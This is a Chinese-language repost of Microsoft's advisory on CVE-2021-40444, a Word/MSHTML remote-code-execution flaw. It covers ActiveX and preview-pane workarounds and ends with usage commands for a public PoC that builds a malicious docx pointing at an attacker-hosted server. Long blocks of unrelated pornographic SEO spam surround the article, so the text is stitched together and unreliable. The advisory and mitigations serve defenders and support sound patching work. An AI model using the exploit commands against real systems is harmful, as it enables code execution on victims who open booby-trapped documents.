国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

微軟Office Word遠程代碼執行漏洞|CVE-2021-40444

安全 漏洞
Microsoft 正在調查 MSHTML 中一個影響 Microsoft Windows 的遠程代碼執行漏洞的報告。

 [[425270]]

漏洞描述

  Microsoft 正在調查 MSHTML 中一個影響 Microsoft Windows 的遠程代碼執行漏洞的報告。Microsoft 發現,存在嘗試通過特別設計的 Microsoft Office 文檔利用此漏洞的針對性攻擊。

  攻擊者可制作一個由托管瀏覽器呈現引擎的 Microsoft Office 文檔使用的惡意 ActiveX 控件。然后,攻擊者必須誘使用戶打開此惡意文件。在系統上配置為具有較少用戶權限的用戶帳戶比具有管理員權限的用戶帳戶所受影響要小。

  Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供檢測和防范已知漏洞的功能。客戶應將反惡意軟件產品保持最新狀態。使用自動更新的客戶不需要采取其他措施。管理更新的企業客戶應當選擇檢測版本 1.349.22.0 或更新版本,以將其部署于整個用戶環境中。Microsoft Defender for Endpoint 警報將顯示為:“Suspicious Cpl File Execution”。

  完成此調查后,Microsoft 將采取有助于保護客戶的適當措施。這可能包括,通過月度發布流程提供安全更新程序,或根據客戶需求不定期提供安全更新程序。

  請參閱緩解措施和解決方法部分,以了解有關保護您的系統免受此漏洞影響之措施的重要信息。

  更新 2021 年 9 月 14 日:Microsoft 已發布安全更新來解決此漏洞。有關適用于您系統的更新,請參閱“安全更新”表。我們建議您立即安裝這些更新。請參閱常見問題解答,以了解適用于您系統的重要信息。

  解決辦法

  在 Internet Explorer 中禁用所有 ActiveX 控件可以緩解這種攻擊。這可以通過使用“本地組策略編輯器”配置組策略或更新注冊表在所有站點中實現。之前安裝的 ActiveX 控件將繼續運行,但是不會受此漏洞的影響。

  如需通過組策略禁用 ActiveX 控件。

  在組策略設置中,導航到計算機配置 > 管理模板 > Windows 組件 > Internet Explorer > Internet 控制面板 > 安全頁面

  對于每個區域:

  1. 選擇區域(Internet 區域、Intranet 區域、本地計算機區域或受信任的站點區域)。
  2. 雙擊下載簽名的 ActiveX 控件并啟用政策。然后將政策中的選項設置為停用。
  3. 雙擊下載未簽名的 ActiveX 控件并啟用政策。然后將政策中的選項設置為停用。

  我們建議將此設置應用至所有區域,以充分保護您的系統。

  變通辦法的影響。

  這可將所有 64 位和 32 位進程的 Internet 區域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設置為禁用 (3)。 新的 ActiveX 控件將不會安裝。之前安裝的 ActiveX 控件將繼續運行。

  如需在單個系統中通過 RegKey 禁用 ActiveX 控件:

  警告如果您不正確地使用注冊表編輯器,則可能會導致嚴重問題(您或許需要重新安裝操作系統)。Microsoft 不保證您可以解決因錯誤使用注冊表編輯器而產生的問題。使用注冊表編輯器的風險由您自己承擔。

  1. 如需在所有區域的 Internet Explorer 中禁用安裝 ActiveX 控件,將以下內容粘貼到文本文件中,并使用 .reg 文件擴展名進行保存:
  1. Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]"1001"=dword:00000003"1004"=dword:00000003 
  1. 雙擊 .reg 文件將其應用到您的策略配置單元中。
  2. 重新啟動系統,以確保應用新配置。

  變通辦法的影響。

  這可將所有 64 位和 32 位進程的 Internet 區域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設置為禁用 (3)。 新的 ActiveX 控件將不會安裝。之前安裝的 ActiveX 控件將繼續運行。

  如何撤消變通辦法

  刪除之前在實施變通辦法過程中添加的注冊表項。

  如需在 Windows Explorer 中禁用預覽

  禁用 Shell Preview 可防止用戶在 Windows Explorer 中預覽文檔。針對您想防止預覽的各類文檔,請執行以下步驟:

  1. 在注冊表編輯器中,導航至合適的注冊表項:

  對于 Word 文檔:

  1. HKEY_CLASSES_ROOT.docx\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.doc\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.docm\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

  對于多格式文本文件:

  1. HKEY_CLASSES_ROOT.rtf\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 
  1. 導出 RegKey 的副本以備份。
  2. 雙擊名稱并在編輯字符串對話框中,刪除“數值數據”。
  3. 單擊確定。

  變通辦法的影響

  用戶將無法在 Windows Explorer 中預覽文檔。

  如何撤消變通辦法

  雙擊您在變通辦法步驟二中創建的 .reg 文件。

  常見問題解答

  “安全更新”表中列有適用于 Windows 8.1、Windows Server 2012 R2 和 Windows Server 2012 的三類更新。我需要在我的系統中安裝什么更新來免受此漏洞的影響?

  運行 Windows 8.1、Windows Server 2012 R2 或 Windows Server 2012 的客戶可應用下列選項之一:月度匯總或僅安全更新和 IE 累積更新。

  我運行的是 Windows 7、Windows Server 2008 R2 或 Windows Server 2008。我需要應用月度匯總和 IE 累積更新嗎?

  • Windows 7、Windows Server 2008 R2 和 Windows Server 2008 的月度匯總中包含此漏洞的更新。應用月度匯總的客戶無需再應用 IE 累積更新。
  • 只應用僅安全更新的客戶還需要應用 IE 累積更新,以免受此漏洞的影響。

  CVE-2021-40444 PoC

  項目地址:

  GitHub: github.com/lockedbyte/CVE-2021-40444

  CVE-2021-40444(Microsoft Office Word 遠程代碼執行)惡意 docx 生成器利用工具 .

  此腳本的創建基于對野外使用的示例的一些逆向工程:

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)

  你需要先安裝 lcab ( sudo apt-get install lcab)

  1. sudo apt-get install lcab 

  檢查REPRODUCE.md手動復制步驟

  如果您生成的 cab 不起作用,請嘗試將 exploit.html URL 指向 calc.cab

  使用方法

  首先生成一個給定 DLL 的惡意 docx 文檔,您可以使用從調用中test/calc.dll彈出 a 的那個calc.exesystem ()

  1. python3 exploit.py generate test/calc.dll http://<SRV IP> 

  生成惡意 docx(將位于out/)后,您可以設置服務器:

sudo python3 exploit.py host 80

  最后在 Windows 虛擬機中嘗試 docx:打開 word 成功彈出計算器.

  poc 下載地址:

  https://github.com/lockedbyte/CVE-2021-40444

 

責任編輯:張燕妮 來源: freebuf.com
相關推薦

2021-09-10 11:41:20

漏洞Windows 微軟

2017-01-19 20:37:58

office word漏洞下溢

2017-05-25 22:20:05

2019-05-15 15:20:01

微軟漏洞防護

2021-11-08 11:52:17

漏洞LinuxLinux TIPC

2020-10-23 09:58:57

漏洞

2017-05-27 10:22:37

2010-01-15 11:20:06

2020-10-25 09:39:49

漏洞分析

2017-06-15 17:28:36

2017-06-14 10:02:22

2009-05-31 15:34:37

2022-01-12 17:39:23

微軟補丁漏洞

2020-10-19 10:43:49

漏洞

2021-01-26 10:00:45

漏洞網絡安全網絡攻擊

2015-03-06 15:31:01

2025-05-08 09:49:19

2021-09-16 14:06:55

遠程代碼漏洞微軟

2020-10-18 08:22:32

安全更新

2025-09-25 16:48:16

點贊
收藏

51CTO技術棧公眾號

欧美亚洲国产日本| 国产精品jizz在线观看麻豆| 青春草在线观看| 99久久99久久久精品齐齐| 国产精品亚洲片夜色在线| 国产一区二区视频在线看| 日韩经典中文字幕| 波多野结衣乳巨码无在线观看| 欧美精品乱人伦久久久久久| 阿v免费在线观看| 精品日本高清在线播放| 国产精品影视| 中文字幕不卡在线观看| 丝袜老师办公室里做好紧好爽| 国产一区二区三区高清播放| 亚洲人体一区| 国产美女娇喘av呻吟久久 | 看黄在线观看| 精品国产91洋老外米糕| 色婷婷在线播放| 亚洲高清不卡av| 天堂中文在线播放| 亚洲免费电影一区| 国产一区二区色噜噜| 久久夜色精品国产欧美乱| 精品国产一区二区三区性色av| 综合久久五月天| av国产精品| 久久69精品久久久久久久电影好 | 欧美三级电影精品| aaa日本高清在线播放免费观看| 在线一区二区三区四区| 男人天堂久久久| 亚洲国产精品免费| www.久久| 国产做受高潮69| 欧美国产美女| 免费精品视频一区二区三区| 丝袜亚洲另类欧美综合| 粉嫩av一区二区三区天美传媒| 久久综合九色欧美综合狠狠| 嫩草嫩草嫩草| 5858s免费视频成人| 成人黄色免费短视频| 午夜精品久久久99热福利| 久久国产电影| 亚洲日本精品国产第一区| 91浏览器在线视频| 香港三级经典全部种子下载| 欧美剧情片在线观看| 免费亚洲电影| 国产精品成人免费视频| 午夜在线精品| 最新中文字幕免费视频| 色八戒一区二区三区| 久久男人av资源站| 欧美极品在线视频| 国产精品成久久久久| 艳色歌舞团一区二区三区| 久久综合成人精品亚洲另类欧美| 国产对白在线正在播放| 亚洲第一页中文字幕| 精品欠久久久中文字幕加勒比| 69堂成人精品视频免费| 国产精品综合在线视频| 白白色在线发布| 国产婷婷色综合av蜜臀av | 国产日韩精品视频一区二区三区 | 精品国精品国产自在久国产应用| 欧美激情国产日韩| 亚洲国产成人一区二区三区| 91caoporm在线视频| 欧美成人一区在线| 亚洲欧美日韩专区| 国产视频一二| 亚洲一区二区久久久| 欧美日韩在线二区| 青青草国产免费| 欧美四级电影网| 成人h动漫免费观看网站| 欧美最大成人综合网| 一区二区三区四区高清精品免费观看 | 蜜芽一区二区三区| 黄p免费网站| 亚洲精品视频在线播放| 日韩精品一区二区久久| www.国产在线播放| 欧美三片在线视频观看| 成人爽a毛片| 欧美 另类 交| 精品视频色一区| 日韩丝袜视频| 青青青在线视频播放| 91麻豆精品国产91久久久| 亚洲bt欧美bt精品777| 丁香色欲久久久久久综合网| 欧美系列日韩一区| 国产一卡不卡| 99热成人精品热久久66| 亚洲精美色品网站| 亚洲香蕉网站| 很黄很污的网站| 日韩一区二区在线视频| 欧美aaa在线| 幼a在线观看| 91av视频在线| 久久久久久亚洲综合影院红桃 | 久久99国内| 日韩av资源在线| 精品亚洲一区二区三区在线观看| 亚洲伦伦在线| 国产在线黄色| 国产热re99久久6国产精品| 国产精品久久久久久久久免费丝袜| 日韩免费小视频| 天天爱天天做天天操| 精品成人a区在线观看| 国产欧美午夜| 日本在线免费看| 动漫一区二区在线| 粉嫩av一区二区三区免费野| 国产一区二区三区电影在线观看| 91n.com在线观看| 美女999久久久精品视频| 99热99精品| 国产精品xnxxcom| 日本成人中文字幕在线| 欧美黑人性猛交| 日本一区免费视频| 国产成人精品福利| 成视频免费在线看| 国产成人拍精品视频午夜网站| 国产精品久久久久久久第一福利| 91成人精品在线| 国产精品黄页网站在线播放免费| 88xx成人精品| 亚洲午夜av在线| 亚洲天堂免费| 成人欧美一区| 色姑娘综合网| 中文一区二区视频| 国产农村妇女毛片精品久久麻豆| 美女视频免费精品| 中文在线中文字幕| 国产亚洲一区在线播放| 日韩一区二区在线播放| 国产一区二区不卡在线 | 久久综合电影| 深夜福利在线视频| 玛丽玛丽电影原版免费观看1977| 精品国产99国产精品| 国产精品影音先锋| 免费观看亚洲天堂| 成人精品3d动漫| 亚洲影视九九影院在线观看| 69成人精品免费视频| 国产一二三精品| 精品五月天堂| 国产youjizz在线| 一区二区日本伦理| 久久99亚洲精品| 色哟哟欧美精品| 久久国产欧美日韩精品| 久久久久久久久成人| 中文字幕av在线播放| 偷拍视频一区二区| 欧美日韩成人在线播放| 无码av中文一区二区三区桃花岛| 欧美专区18| 欧美经典一区| 国产资源在线观看| 99热这里只有精品免费| 国产91在线播放九色快色| 欧美日韩国产精选| 99久久伊人久久99| 99re久久最新地址获取| 牛牛精品一区二区| 一二三四中文在线| 一区二区三区观看| 日韩免费视频在线观看| 精品国产一区二区三区久久影院 | 欧美人与z0zoxxxx视频| www.亚洲色图.com| 羞羞答答成人影院www| 人人视频精品| 日本天堂影院在线视频| 亚洲色成人www永久在线观看| 国产狼人综合免费视频| 亚洲视频在线免费看| 欧美日韩国产在线| 不卡一区中文字幕| 亚洲久久在线| 国产精品zjzjzj在线观看| aaa在线观看| 中文字幕天天干| 性欧美精品一区二区三区在线播放 | 视频一区在线视频| 国产精品videossex| 少女频道在线观看免费播放电视剧| 色偷偷亚洲女人天堂观看欧|